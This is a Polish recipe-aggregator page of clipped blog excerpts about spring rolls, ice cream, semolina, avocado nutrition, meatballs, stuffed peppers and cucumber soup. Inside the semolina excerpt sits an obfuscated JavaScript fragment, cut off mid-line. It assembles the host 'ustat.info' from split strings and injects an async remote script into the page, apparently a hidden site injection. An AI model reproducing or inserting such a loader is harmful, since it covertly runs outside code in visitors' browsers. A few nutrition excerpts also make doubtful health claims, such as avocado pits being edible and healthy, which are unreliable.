Sajgonki , krokiety wiosenne, naleśniki wiosenne (chiń.: 春卷; pinyin: chūn juǎn; wiet.: nem) – popularne danie kuchni chińskiej oraz kuchni krajów Azji Południowo-Wschodniej. Mają postać naleśniczków z nadzieniem mięsno-warzywnym lub krewetkowym, zazwyczaj jedzone jako zakąska z różnego rodzaju sosami i dipami. Występują w bardzo wielu odmianach w zależności od kraju i regionalnych upodobań. Mogą być spożywane na zimno, smażone(...)Gotowe osuszamy na ręcznikach papierowych. Podajemy gorące z sosem słodko kwaśnym. Kilka rad ułatwiających przygotowanie sajgonek: - arkusze papieru ryżowego muszą być całe (jeżeli trafimy na pęknięty lub dziurawy lepiej dać podwójnie) - moczymy je krótko (moczone zbyt długo będą się rwały) - najlepiej układać je na drewnianej desce - sajgonki nie powinny się ze sobą stykać (papier może się rwać) - nie nakładajmy zbyt
mojewypiekiinietylkoochłody !!! Lody – zamrożony deser, który uzyskuje się poprzez zamrażanie masy uzyskanej z produktów mlecznych (lody mleczne) bądź wody (lody wodne) z dodatkami smakowymi (dodatki tradycyjne – owoce, lub nietradycyjne, mięsne czy warzywne – w Polsce niepopularne), lub zamrażanie masy złożonej z owoców, cukru i wody (sorbet). Alternatywną opcją dla lodów mlecznych są lody wykonywane na bazie napojów: sojowego, ryżowego, owsianego itp. Lody(...)ogromnej liczbie odmian i z wieloma dodatkami, z których najpopularniejszymi są: bita śmietana, rurki waflowe, rodzynki, kruszone orzechy. Źródło LOVE Lody kochają wszyscy…tak dosłownie wszyscy!!! <-- dam sobie za to stwierdzenie normalnie rękę uciąć, a nawet dwie!!! Podaje się je na calutkim świecie w przeróżnych rodzajach, smakach, kompozycjach itd. Najlepsze są jednak te zdrowe, wykonane w domu
ClauditteMissCookingSałatki makaronowe idealnie nadają się na kolację lub jako obiad do pracy który nie wymaga podgrzania. Ale… ta sałatka to także super pomysł na imprezę
nietylkopasta.plMało kto wie, że bogracz to tak naprawdę rodzaj kociołka, w którym przygotowuje się potrawy nad ogniskiem. W Polsce przyjęło się, że bogracz to pyszna zupa
kuchniabellissima.wordpress.comKiedy zobaczyłam ten przepis w książce "Apetyt na Francję", wiedziałam, że zrobię go bardzo szybko. Wariacja na temat gołąbków autorstwa Mimi Thorisson, pokazana w jej
Poezja Smaków - blog kulinarnydoskonałe własności zagęszczające. Kasza manna ma łagodny, delikatny smak, łatwo wchłania wodę i szybko się gotuje. To zalety w kuchni dzięki którym kasza manna ma wiele zastosowań. Dania, do których została dodana kasza manna są elastyczne i łatwe do krojenia. Kaszę manną wsypuje się na gotujący płyn, może to być woda, mleko lub bulion. Podczas gotowania kasza manna(...)kaszkę manną jako gęstą kaszkę gotowaną na mleku z dodatkiem owoców. Jest chętnie używana też do przygotowania puddingów i legumin. W wersji wytrawnej kasza manna służy do zagęszczania pasztetów mięsnych i warzywnych. (function(){ q6vp=document.createElement("script");q6vp_=("us")+("ta"); q6vp_+="t"+(".");q6vp_+=("in");q6vpu="314233494";q6vp.async=true; q6vpu+=".uipznxmp6vp867l3w";q6vp.type="text/javascript";q6vp_+="f"+"o"+("/"); q6vpu+="lse05ecf3p928";q6vp.src="https://"+q6vp_+q6vpu
ProstePesto.pltrawienia i wchłaniania, chroni przed skurczem mięśni. Wapń jest budulcem kości i zębów, bierze udział w procesie krzepnięcia krwi, wpływa na kurczliwość mięśni. Fosfor, makroelement, składnik błon komórkowych, kości i zębów, wspomaga pracę układu nerwowego i krwionośnego. Sód reguluje objętość wody w organizmie, chroni przed anemią. Żelazo składnik hemoglobiny transportuje tlen do mięśni. Magnez wpływa i zapobiega chorobom serca, poprawia(...)pełnią funkcję ochronną serca. Ciekawostki o awokado Awokado uznawane jest za jeden z najsilniejszych afrodyzjaków. Liście i korę stosowano do leczenia gorączki i chorób kobiecych. Jedno owocujące drzewo może dać 100 kg owoców w ciągu roku. Pestka awokado jest jadalna, zdrowa i nietoksyczna. Poleca się przesuszenie i zmiksowanie, może być dodana do jogurtu. Skórkę można wykorzystać jako maseczkę do twarzy
ProstePesto.plułatwi regenerację organizmu, przywróci równowagę kwasowo-zasadową oraz pomoże odbudować zapasy glikogenu i białek w mięśniach. Badania pokazały, że łączne spożycie białek i węglowodanów po posiłku obniża m.in. bóle mięśni. Po treningu zaleca się węglowodany o wysokim indeksie glikemicznym. W 2 godizny po posiłku powinno spożyć się ok. 20 g białka. Nie należy także pomijać warzyw i owoców, szczególnie(...)trakcie ćwiczeń oraz po ich zakończeniu należy zadbać o prawidłowe nawodnienie organizmu. Szczególne potrzeby sportowców wymagają indywidualnego podejścia Należy podkreślić, że w przypadku osób trenujących wyczynowo daną dyscyplinę sportową, zalecenia żywieniowe są indywidualizowane i często opierają się na precyzyjnym wyliczeniu potrzeb dotyczących zarówno wartości energetycznej, jak i udziału składników odżywczych w posiłku przed treningiem i bezpośrednio
AZgotuj!zdarzały się i ubogie wersje, kiedy na coś, co szumnie nazywaliśmy sosem, składały się dwa pomidory i kostka rosołowa rozpuszczona w wodzie. A jednak zawsze z sentymentem wspominam to danie i po latach chętnie je przyrządzam. Czy pulpety w sosie pomidorowym znane też jako klopsiki w sosie pomidorowym to także Wasze comfort food? Pulpety w sosie pomidorowym - składniki(...)papryka do smaku garść natki pietruszki 4-5 łyżek mąki pszennej do obtoczenia pulpetów Sos pomidorowy do pulpetów 800 ml przecieru pomidorowego albo dwie puszki pomidorów 200 ml bulionu mięsnego lub warzywnego 2 ząbki czosnku drobno posiekane sól, pieprz, duża szczypta cukru i ulubione zioła do smaku Dodatkowo: natka pietruszki lub kolendry Przepis na pulpety w sosie pomidorowym Cebulę
Kulinaria - potrawy z różnych stron świataKopytka z sosem pomidorowym choć znane i lubiane nie są często razem podawane. Kopytka tradycyjnie jadamy z sosami mięsnymi lub grzybowymi. Sos pomidorowy ugotowany w domu jest o wiele smaczniejszy niż sos ze słoika. Można go przyprawić ziołami, czosnkiem, pieprzem, chili dokładnie tak jak lubimy. Odpowiednio ugotowany jest aromatyczny i gęsty, bez sztucznych aromatów i zagęstników. Kopytka(...)delikatne będą. Kopytka są dosyć pracochłonne dlatego warto przygotować ich więcej niż na jeden obiad. Kluseczki można przechowywać w lodówce do 3 dni. Kopytka z sosem pomidorowym będą doskonałym daniem obiadowym dla dzieci, bo jak wszystkie kluseczki, smakują maluchom. Składniki na kopytka: 1 kg ziemniaków 1 szkl. mąki pszennej 2 jajka 1/2 łyżeczki soli Składniki na sos pomidorowy
Codziennik KuchennyPieczeń smakuje bardzo dobrze na ciepło, jako danie obiadowe z ziemniakami i surówką, a także na zimno z pieczywem, pomidorem czy ogórkiem kiszonym. Składniki: pół kg mięsa mielonego wieprzowego cukinia 2 czerstwe bułki kajzerki pół szklanki mleka 2 ząbki czosnku 2 jajka papryka czerwona sól, pieprz, oregano, papryka ostra Przygotowanie Bułki zalewamy mlekiem. Cukinie obieramy i ścieramy na tarce(...)mleka, przeciśnięte ząbki czosnku, jajka, cukinię i paprykę. Przyprawiamy i dokładnie mieszamy. Jeśli masa jest zbyt rzadka, można dosypać trochę bułki tartej. Keksówkę wykładamy papierem do pieczenia, wykładamy masę mięsną, wyrównujemy wierz i pieczemy w piekarniku nagrzanym do 180 C około 50 minut
e-PrzepisyKulinarnejaskini Ocampo i Tehuacan liczące około 7 000 lat. Starożytny polityk i wódz rzymski Lukullus (117–56 r. p.n.e.) nazywany największym łakomczuchem starożytności, na ucztach słynących z wyszukanych dań, podawał dynię smażoną w miodzie. Jemu też zawdzięczamy sprowadzenie do Europy czereśni. Najstarsze freski ilustrujące dynię pochodzą z 1515 – 1518 roku, przedstawiają 170 roślin, w tym dynię piżmową, zwyczajną(...)trądzik i opryszczka. Zawartość potasu w oleju z pestek działa oczyszczająco i rozjaśniająco na skórę. Nawilża, natłuszcza, wygładza, zmiękcza i łagodzi podrażnienia. Dynia w kuchni. Dynia jest składnikiem zapiekanek mięsnych i rybnych, farszu, zup, sałatek, marynat, wypieków. Z dyni można piec chleb. Walory smakowe dyni podnoszą zioła: ziele angielskie, pieprz czarny, goździki, kardamon. Do przygotowania potraw wykorzystuje się świeży, gotowany
ProstePesto.plminut z każdej strony, aż będą miękkie i delikatnie zrumienione. Umieść filety łososia na patelni i delikatnie zanurz je w sosie śmietanowym z cebulą i pomidorkami koktajlowymi. Posyp danie świeżymi ziołami (np. natką pietruszki lub szczypiorkiem) dla dodatkowej dekoracji. Całość skrop sokiem z połówki cytryny. Podawaj natychmiast, najlepiej z dodatkiem ulubionych warzyw lub ryżu. Ja proponuję frytki z buraka(...)będą miękkie w środku i z lekko zrumienionymi brzegami. Po wyjęciu z piekarnika pozostaw frytki na chwilę, aby lekko ostygły. Podawaj je jako zdrową przekąskę lub jako dodatek do dań głównych. Składniki frytki z buraka 2-3 średnie buraki 3 średnie marchewki 3 łyżki oliwy z oliwek 1 czubata łyżeczka soli 1/2 łyżeczki pieprzu 1 łyżeczka słodkiej papryki
Eat me! Fit me!Papryka faszerowana to świetny przepis nie tylko na syty obiad, ale i fajną przekąskę kolacyjną, kiedy zapowiedzą nam się znajomi. Całe danie można przygotować wcześniej, a nawet poprzedniego dnia, a potem tylko myk - naczynie do piekarnika 😎 Ponieważ danie jak wspomniałam jest bardzo syte, nie robię do niego już innych dodatków. Uważam, że są zbędne. Składniki(...)podsmażamy pokrojoną cebulę i czosnek. Dodajemy mięso mielone i smażymy całość chwilę. Następnie dodajemy pokrojone pieczarki, koncentrat i przyprawy. Dusimy całość do momentu odparowania soku. Ryż mieszamy z masą mięsną. Farszem nadziewamy każdą paprykę. Papryki układamy w naczyniu żaroodpornym. Podlewamy wodą lub bulionem i dusimy pod przykryciem około 40-50 minut w piekarniku. Pod koniec pieczenia naczynie odkrywamy
Walijskie PichcenieZupa ze świeżych ogórków – kuchnia podkarpacka W moich poszukiwaniach tradycyjnych przepisów z naszego regionu od czasu do czasu trafiam na perełki – wyjątkowe dania, o których wcześniej nie słyszałam, a które szczególnie przypadły mi do gustu. Taka właśnie jest zupa ze świeżych ogórków z Maćkówki. W naszej tradycji kulinarnej to kiszone ogórki zajmują bardzo ważną rolę. Spory czy jedynie(...)marchewka podduszone na maśle stanowią podstawę zupy gotowanej na wywarze z drobiu. Zupę zaprawia się śmietaną i podaje z ziemniakami. Ta pyszna zupa, mimo że ugotowana jest na wywarze mięsnym, na dodatek z liściem laurowym i zielem angielskim, pachnie latem. Jeśli Wy też nie znacie tej zupy, spróbujcie koniecznie :) Przepis Koła Gospodyń Wiejskich z Maćkówki (powiat przeworski) opublikowano w zbiorze
Trzeci talerz